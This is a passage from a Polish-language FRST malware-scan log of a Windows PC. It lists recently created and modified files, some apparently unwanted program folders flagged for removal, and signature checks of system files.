Corporation) C:\WINDOWS\system32\acmigration.dll 2017-06-15 14:22 - 2017-06-03 12:14 - 00096608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2017-06-15 14:22 - 2017-06-03 12:14 - 00034648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2017-06-15 14:22 - 2017-06-03 12:01 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll 2017-06-15 14:22 - 2017-06-03 11:48 - 01112416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll 2017-06-15 14:22 - 2017-06-03 11:40 - 01566552 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2017-06-15 14:22 - 2017-06-03 11:40 - 00628552 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-06-15 14:22 - 2017-06-03 11:22 - 07217152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2017-06-15 14:22 - 2017-06-03 11:18 - 22569984 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-06-15 14:22 - 2017-06-03 11:16 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll 2017-06-15 14:22 - 2017-06-03 11:14 - 00045056 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2017-06-15 14:22 - 2017-06-03 11:10 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll 2017-06-15 14:22 - 2017-06-03 11:08 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-06-15 14:22 - 2017-06-03 11:07 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\HNetCfgClient.dll 2017-06-15 14:22 - 2017-06-03 11:06 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll 2017-06-15 14:22 - 2017-06-03 11:01 - 00856064 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll 2017-06-15 14:22 - 2017-06-03 11:00 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-06-15 14:22 - 2017-06-03 10:56 - 13091840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-06-15 14:22 - 2017-06-03 10:52 - 00975872 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe 2017-06-15 14:22 - 2017-06-03 10:52 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll 2017-06-15 14:22 - 2017-06-03 10:51 - 01418240 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe 2017-06-15 14:22 - 2017-06-03 10:49 - 02475520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2017-06-15 14:22 - 2017-06-03 10:49 - 01845248 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2017-06-15 14:22 - 2017-06-03 10:49 - 00351744 _____ (Microsoft Corporation) C:\WINDOWS\system32\hnetcfg.dll 2017-06-15 14:22 - 2017-06-03 08:08 - 00080078 _____ C:\WINDOWS\system32\normidna.nls 2017-06-15 14:21 - 2017-06-03 12:16 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2017-06-15 14:21 - 2017-06-03 12:14 - 01214816 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2017-06-15 14:21 - 2017-06-03 12:14 - 00544096 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2017-06-15 14:21 - 2017-06-03 12:14 - 00334176 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2017-06-15 14:21 - 2017-06-03 12:14 - 00233824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll 2017-06-15 14:21 - 2017-06-03 11:59 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2017-06-15 14:21 - 2017-06-03 11:54 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2017-06-15 14:21 - 2017-06-03 11:50 - 00381792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS 2017-06-15 14:21 - 2017-06-03 11:48 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-06-15 14:21 - 2017-06-03 11:48 - 00989024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-06-15 14:21 - 2017-06-03 11:39 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2017-06-15 14:21 - 2017-06-03 11:15 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys 2017-06-15 14:21 - 2017-06-03 11:08 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll 2017-06-15 14:21 - 2017-06-03 10:58 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdProxy.dll 2017-06-15 11:01 - 2017-06-15 11:01 - 00000000 ____D C:\Users\Cepek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera Software 2017-06-12 22:39 - 2017-06-12 22:40 - 04744412 _____ C:\Users\Cepek\Downloads\Strategia rozwoju turystyki Krainy Lessowych Wąwozów na lata 2008-2013.pdf 2017-06-12 22:39 - 2017-06-12 22:39 - 00915086 _____ C:\Users\Cepek\Downloads\SRPL.pdf 2017-06-11 10:22 - 2017-06-11 10:22 - 00456645 _____ C:\Users\Cepek\Downloads\analiza-podazy-turystyki-zdrowotnej.pdf 2017-06-10 15:04 - 2017-06-10 15:04 - 00807121 _____ C:\Users\Cepek\Downloads\wykorzystanie_turystycznych_obiektow_noclegowych_w_2016_roku.pdf 2017-06-10 14:33 - 2017-06-10 14:34 - 08499001 _____ C:\Users\Cepek\Downloads\turystyka_w_2015.pdf 2017-06-10 14:33 - 2017-06-10 14:33 - 14421278 _____ C:\Users\Cepek\Downloads\polska_w_liczbach_2017.pdf 2017-06-10 14:33 - 2017-06-10 14:33 - 02402852 _____ C:\Users\Cepek\Downloads\turystyczna_baza_noclegowa_w_polsce_w_2016.pdf 2017-06-10 14:33 - 2017-06-10 14:33 - 00347448 _____ C:\Users\Cepek\Downloads\turysci_w_bazie_noclegowej_marzec_2017.xlsx 2017-06-10 14:33 - 2017-06-10 14:33 - 00303070 _____ C:\Users\Cepek\Downloads\akty.pdf 2017-06-10 14:33 - 2017-06-10 14:33 - 00263171 _____ C:\Users\Cepek\Downloads\turystyka_w_unii_europejskiej_2015.pdf 2017-06-10 11:40 - 2017-06-11 09:43 - 00023199 ____H C:\Users\Cepek\Desktop\~WRL2006.tmp 2017-06-10 11:02 - 2017-06-10 11:02 - 00402944 _____ C:\Users\Cepek\Downloads\Strategi raozwoju na szczeblu regionalnym.ppt 2017-06-10 09:26 - 2017-06-10 09:26 - 00001249 _____ C:\Users\Cepek\Desktop\Cersanit planer.lnk 2017-06-10 09:26 - 2017-06-10 09:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wirtualny Planer - Cersanit 2017-06-10 09:26 - 2017-06-10 09:26 - 00000000 ____D C:\Program Files (x86)\Wirtualny Planer - Cersanit 2017-06-09 20:31 - 2017-06-09 20:31 - 00004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-06-09 20:31 - 2017-06-09 20:31 - 00004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-06-09 20:31 - 2017-06-09 20:31 - 00003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-06-09 20:31 - 2017-06-09 20:31 - 00003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-06-09 20:31 - 2017-06-09 20:31 - 00003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-06-09 20:31 - 2017-06-09 20:31 - 00003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-06-09 20:31 - 2017-06-09 20:31 - 00003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-06-09 20:31 - 2017-06-09 20:31 - 00003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-06-09 20:30 - 2017-05-03 22:21 - 00175736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll 2017-06-09 20:30 - 2017-05-03 22:21 - 00143480 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll 2017-06-08 17:48 - 2017-06-14 16:55 - 00003270 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2 2017-06-08 14:05 - 2017-06-08 14:06 - 02935409 _____ C:\Users\Cepek\Downloads\transport_drogowy_w_polsce_w_latach_2014-2015.pdf 2017-06-08 10:56 - 2017-06-08 10:56 - 06277445 _____ C:\Users\Cepek\Downloads\oswiata_i_wychowanie.pdf 2017-06-08 10:32 - 2017-06-08 10:32 - 03673802 _____ C:\Users\Cepek\Downloads\StrategiaRozwojuMiastaiGminyNiepolomice.pdf 2017-06-08 10:29 - 2017-06-08 10:29 - 00178299 _____ C:\Users\Cepek\Downloads\akt_nr_103.pdf 2017-06-08 10:23 - 2017-06-08 10:23 - 14379843 _____ C:\Users\Cepek\Downloads\ZAŁĄCZNIK DO UCHWAŁY NR XXI-106-2016 RADY GMINY RADZIEMICE Z DNIA 05 MAJA 2016 R..pdf 2017-06-08 10:20 - 2017-06-08 10:20 - 00402944 _____ C:\Users\Cepek\Downloads\Strategia rozwoju turystyki na szczeblu regionalnym_lokalnym.ppt 2017-06-07 10:11 - 2017-06-07 10:11 - 00294098 _____ C:\Users\Cepek\Downloads\Organizacje_uczace_sie_2.pptx 2017-06-07 09:15 - 2017-06-07 09:15 - 00030961 _____ C:\ProgramData\agent.update.1496819746.bdinstall.bin 2017-05-31 13:47 - 2017-05-31 13:47 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-05-31 11:36 - 2017-05-31 11:36 - 00002200 _____ C:\Users\Cepek\Desktop\big_bang_empire.lnk 2017-05-28 17:06 - 2017-05-28 17:06 - 00055884 _____ C:\Users\Cepek\Downloads\Addition.txt 2017-05-27 22:35 - 2017-05-27 22:36 - 00065621 _____ C:\Users\Cepek\Desktop\Addition.txt 2017-05-27 22:34 - 2017-06-16 16:04 - 00039116 _____ C:\Users\Cepek\Desktop\FRST.txt 2017-05-27 22:26 - 2017-06-16 16:00 - 02438656 _____ (Farbar) C:\Users\Cepek\Desktop\FRST64.exe 2017-05-26 18:54 - 2017-05-31 13:46 - 00000000 ____D C:\Users\Cepek\AppData\Local\terana 2017-05-24 14:36 - 2017-05-24 14:36 - 00033432 _____ C:\Users\Cepek\Downloads\GMER.txt 2017-05-24 13:46 - 2017-05-24 13:51 - 00434076 _____ C:\WINDOWS\Minidump\052417-35390-01.dmp 2017-05-24 13:29 - 2017-05-24 13:46 - 00000000 ____D C:\WINDOWS\Minidump 2017-05-24 13:29 - 2017-05-24 13:34 - 00462924 _____ C:\WINDOWS\Minidump\052417-41078-01.dmp 2017-05-24 13:28 - 2017-05-24 13:46 - 797865173 _____ C:\WINDOWS\MEMORY.DMP 2017-05-24 13:15 - 2017-05-28 17:52 - 00000000 ____D C:\Users\Cepek\Desktop\wirus raport 2017-05-24 13:13 - 2017-05-24 13:16 - 00000000 ____D C:\AdwCleaner 2017-05-24 13:01 - 2017-05-24 13:01 - 00028242 _____ C:\Users\Cepek\Downloads\FRST.txt 2017-05-22 21:07 - 2017-05-22 21:08 - 05840896 _____ C:\Users\Cepek\Downloads\Zarządzanie-PROCESAMI-2016.ppt 2017-05-20 11:40 - 2017-05-20 11:44 - 00000000 ____D C:\Users\Cepek\Desktop\zd 2017-05-19 17:39 - 2017-05-22 11:27 - 00000000 ____D C:\Users\Cepek\AppData\Local\CSHMDR 2017-05-18 13:31 - 2017-06-02 16:37 - 00003992 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1411055990 2017-05-17 11:05 - 2017-06-02 16:41 - 00000000 ____D C:\Users\Cepek\AppData\Roaming\WinSAPSvc ==================== Jeden miesiąc - zmodyfikowane pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-06-16 16:00 - 2017-05-12 16:05 - 00000000 ____D C:\FRST 2017-06-16 15:51 - 2016-09-25 12:46 - 00000000 ____D C:\Program Files\Bitdefender Agent 2017-06-16 15:15 - 2014-04-03 15:58 - 00000000 ____D C:\Users\Cepek\AppData\Roaming\Origin 2017-06-16 15:07 - 2013-11-07 17:18 - 00000000 ____D C:\ProgramData\Origin 2017-06-16 14:55 - 2016-07-16 13:47 - 00000000 ___HD C:\Program Files\WindowsApps 2017-06-16 14:55 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\AppReadiness 2017-06-16 14:52 - 2017-05-02 20:28 - 00004222 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{F89D2636-75F2-4436-AF64-F71AE65A526F} 2017-06-16 14:49 - 2016-10-13 17:26 - 00000000 ____D C:\ProgramData\NVIDIA 2017-06-16 14:47 - 2016-09-23 14:41 - 00000000 _____ C:\Users\Public\Documents\report.dat 2017-06-16 14:47 - 2013-11-23 14:16 - 00000000 ____D C:\Users\Cepek\AppData\Roaming\Dropbox 2017-06-16 14:46 - 2017-05-12 15:58 - 00000000 ____D C:\Users\Cepek\AppData\Roaming\.ACEStream 2017-06-16 14:46 - 2017-05-04 17:47 - 00000000 ____D C:\Users\Cepek\AppData\Local\background_fault 2017-06-16 14:45 - 2017-04-18 14:33 - 00000000 ____D C:\Program Files\Panda Security URL Filtering 2017-06-16 14:45 - 2016-10-13 17:30 - 00000000 ____D C:\Users\Cepek 2017-06-16 14:45 - 2014-07-02 14:18 - 00000000 __SHD C:\Users\Cepek\IntelGraphicsProfiles 2017-06-16 00:22 - 2016-10-13 17:25 - 00000031 _____ C:\WINDOWS\system32\bbcap.err 2017-06-15 21:58 - 2016-10-13 17:29 - 02809582 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-06-15 21:58 - 2016-07-17 00:05 - 01131656 _____ C:\WINDOWS\system32\perfh015.dat 2017-06-15 21:58 - 2016-07-17 00:05 - 00290658 _____ C:\WINDOWS\system32\perfc015.dat 2017-06-15 18:51 - 2016-10-13 17:21 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2017-06-15 17:11 - 2016-07-16 13:36 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-06-15 17:00 - 2016-07-16 13:45 - 00000000 ____D C:\WINDOWS\INF 2017-06-15 16:13 - 2016-10-13 17:58 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-06-15 16:13 - 2016-10-13 17:21 - 05083880 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-06-15 16:12 - 2014-01-03 19:42 - 00000000 ____D C:\Program Files\Microsoft Silverlight 2017-06-15 16:12 - 2014-01-03 19:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2017-06-15 15:32 - 2016-07-16 08:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI 2017-06-15 15:30 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-06-15 15:30 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-06-15 15:30 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-06-15 15:22 - 2014-01-03 19:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2017-06-15 15:22 - 2013-09-25 12:34 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-06-15 15:22 - 2013-09-25 12:34 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-06-15 14:59 - 2014-01-03 19:27 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013 2017-06-15 14:47 - 2009-07-14 04:34 - 00000766 _____ C:\WINDOWS\win.ini 2017-06-14 16:55 - 2016-01-23 20:32 - 00002442 _____ C:\Users\Cepek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-06-14 16:55 - 2016-01-23 20:32 - 00000000 ___RD C:\Users\Cepek\OneDrive 2017-06-13 17:14 - 2016-12-27 23:16 - 00001220 _____ C:\Users\Public\Desktop\FIFA 17.lnk 2017-06-13 07:51 - 2016-01-23 20:25 - 00000000 ____D C:\Users\Cepek\AppData\Local\Packages 2017-06-13 07:21 - 2014-12-14 12:28 - 00000000 ____D C:\Users\Cepek\AppData\Local\CrashDumps 2017-06-09 20:31 - 2016-12-28 19:04 - 00001485 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2017-06-09 20:31 - 2016-10-13 17:25 - 00000000 ____D C:\ProgramData\NVIDIA Corporation 2017-06-09 20:31 - 2016-10-13 17:25 - 00000000 ____D C:\Program Files\NVIDIA Corporation 2017-06-09 20:31 - 2016-10-13 17:25 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2017-06-08 11:35 - 2014-04-03 15:48 - 00000000 ____D C:\Program Files (x86)\Origin 2017-06-05 20:58 - 2016-12-09 14:01 - 00000000 ___HD C:\_acestream_cache_ 2017-06-03 08:36 - 2016-07-16 13:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-06-03 08:36 - 2016-07-16 13:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-06-02 16:41 - 2017-05-04 17:47 - 00003664 _____ C:\WINDOWS\System32\Tasks\Milimili 2017-06-02 16:37 - 2014-02-10 12:09 - 00000000 ____D C:\Program Files (x86)\Opera 2017-05-31 13:48 - 2017-04-17 17:52 - 00000000 ____D C:\Users\Cepek\AppData\LocalLow\Mozilla 2017-05-31 13:47 - 2017-05-09 17:14 - 00002069 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2017-05-31 13:47 - 2017-04-17 17:51 - 00001999 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2017-05-31 13:47 - 2016-10-13 17:43 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-05-31 11:59 - 2013-09-24 19:53 - 00565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe 2017-05-31 11:36 - 2017-05-05 15:56 - 00002174 _____ C:\Users\Cepek\Desktop\BigFarm.lnk 2017-05-25 20:32 - 2017-05-02 18:01 - 00000000 ____D C:\Users\Cepek\AppData\Local\SNARE 2017-05-25 20:29 - 2017-05-02 18:00 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS 2017-05-24 13:38 - 2017-05-02 17:54 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-05-24 12:22 - 2017-05-09 17:12 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-23 10:46 - 2015-02-05 12:57 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2017-05-22 11:29 - 2015-07-12 11:33 - 00002557 _____ C:\Users\Cepek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder.lnk ==================== Pliki w katalogu głównym wybranych folderów ======= 2014-11-07 10:49 - 2014-12-18 19:29 - 0000132 _____ () C:\Users\Cepek\AppData\Roaming\Preferencje CC formatu BMP firmy Adobe 2014-11-07 10:47 - 2014-11-07 10:47 - 0000132 _____ () C:\Users\Cepek\AppData\Roaming\Preferencje CC formatu GIF firmy Adobe 2014-11-07 10:48 - 2016-09-14 14:34 - 0000132 _____ () C:\Users\Cepek\AppData\Roaming\Preferencje CC formatu PNG firmy Adobe 2014-05-17 12:18 - 2017-03-11 14:43 - 0000132 _____ () C:\Users\Cepek\AppData\Roaming\Preferencje formatu PNG CS6 firmy Adobe 2014-01-10 16:43 - 2014-01-28 12:43 - 0000087 _____ () C:\Users\Cepek\AppData\Roaming\WB.CFG 2015-01-24 12:35 - 2015-01-24 12:35 - 0000038 ___SH () C:\Users\Cepek\AppData\Local\69ff07055291669bb2b218.72821112 2014-11-09 13:10 - 2014-11-15 14:12 - 0001496 _____ () C:\Users\Cepek\AppData\Local\Adobe Zapisz dla Internetu 13.0 Prefs 2016-11-04 12:19 - 2016-11-04 12:19 - 0001677 _____ () C:\Users\Cepek\AppData\Local\recently-used.xbel 2013-09-25 10:47 - 2013-09-25 10:50 - 0034348 _____ () C:\ProgramData\1380098849.1164.bin 2013-09-25 10:47 - 2013-09-25 10:51 - 0006160 _____ () C:\ProgramData\1380098849.208.bin 2013-09-25 10:50 - 2013-09-25 10:50 - 0001420 _____ () C:\ProgramData\1380098849.2304.bin 2013-09-25 10:48 - 2013-09-25 10:49 - 0004420 _____ () C:\ProgramData\1380098849.3976.bin 2013-09-25 10:48 - 2013-09-25 10:50 - 0083380 _____ () C:\ProgramData\1380098849.4704.bin 2013-09-25 10:48 - 2013-09-25 10:50 - 0012247 _____ () C:\ProgramData\1380098849.4712.bin 2013-09-25 10:47 - 2013-09-25 10:50 - 0018239 _____ () C:\ProgramData\1380098849.4752.bin 2013-09-25 10:47 - 2013-09-25 10:50 - 0050991 _____ () C:\ProgramData\1380098849.4920.bin 2013-12-18 13:25 - 2013-12-18 13:25 - 0037590 _____ () C:\ProgramData\1387365953.bdinstall.bin 2013-12-18 13:29 - 2013-12-18 13:29 - 0201198 _____ () C:\ProgramData\1387365958.bdinstall.bin 2014-02-08 19:19 - 2014-02-08 19:19 - 0037841 _____ () C:\ProgramData\1391879941.bdinstall.bin 2014-02-08 19:20 - 2014-02-08 19:20 - 0094566 _____ () C:\ProgramData\1391879945.bdinstall.bin 2014-07-01 16:25 - 2014-07-01 16:25 - 0354469 _____ () C:\ProgramData\1404222753.bdinstall.bin 2014-07-01 16:55 - 2014-07-01 16:55 - 0580076 _____ () C:\ProgramData\1404224867.bdinstall.bin 2016-05-12 15:36 - 2016-05-12 15:36 - 0245697 _____ () C:\ProgramData\1463060111.bdinstall.bin 2016-09-25 12:46 - 2016-09-25 12:46 - 0046331 _____ () C:\ProgramData\agent.1474800363.bdinstall.bin 2016-09-25 12:55 - 2016-09-25 12:55 - 0026893 _____ () C:\ProgramData\agent.1474800905.bdinstall.bin 2016-11-01 21:04 - 2016-11-01 21:04 - 0028755 _____ () C:\ProgramData\agent.1478027093.bdinstall.bin 2016-12-02 14:24 - 2016-12-02 14:24 - 0028185 _____ () C:\ProgramData\agent.1480680929.bdinstall.bin 2016-12-02 15:12 - 2016-12-02 15:12 - 0028469 _____ () C:\ProgramData\agent.1480684372.bdinstall.bin 2017-06-07 09:15 - 2017-06-07 09:15 - 0030961 _____ () C:\ProgramData\agent.update.1496819746.bdinstall.bin 2013-11-29 16:46 - 2013-11-29 16:46 - 0000094 _____ () C:\ProgramData\CameraRecorder.ini 2016-10-28 13:38 - 2016-10-28 13:38 - 0213367 _____ () C:\ProgramData\cl.1477654586.bdinstall.bin 2014-12-07 11:51 - 2014-12-10 21:41 - 0000193 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc 2016-12-31 17:30 - 2017-02-07 13:17 - 0032599 _____ () C:\ProgramData\NvTelemetryContainer.log 2016-12-31 17:30 - 2017-01-14 21:27 - 0017605 _____ () C:\ProgramData\NvTelemetryContainer.log_backup1 Pliki do przeniesienia lub usunięcia: ==================== C:\Program Files\Hola\app\hola.exe C:\Users\Cepek\AppData\Local\background_fault\aswRD.exe Niektóre pliki w TEMP: ==================== 2017-06-16 14:46 - 2017-06-16 14:46 - 0043008 _____ () C:\Users\Cepek\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpxwmgac.dll ==================== Bamital & volsnap ====================== (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) C:\WINDOWS\system32\winlogon.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\wininit.exe => Plik podpisany cyfrowo C:\WINDOWS\explorer.exe => Plik podpisany cyfrowo C:\WINDOWS\SysWOW64\explorer.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\svchost.exe => Plik podpisany cyfrowo C:\WINDOWS\SysWOW64\svchost.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\services.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\User32.dll => Plik podpisany cyfrowo C:\WINDOWS\SysWOW64\User32.dll => Plik podpisany cyfrowo C:\WINDOWS\system32\userinit.exe => Plik podpisany cyfrowo C:\WINDOWS\SysWOW64\userinit.exe => Plik podpisany cyfrowo C:\WINDOWS\system32\rpcss.dll => Plik podpisany cyfrowo C:\WINDOWS\system32\dnsapi.dll => Plik podpisany cyfrowo C:\WINDOWS\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo C:\WINDOWS\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo LastRegBack: 2017-06-11 17:36 ==================== Koniec FRST.txt ============================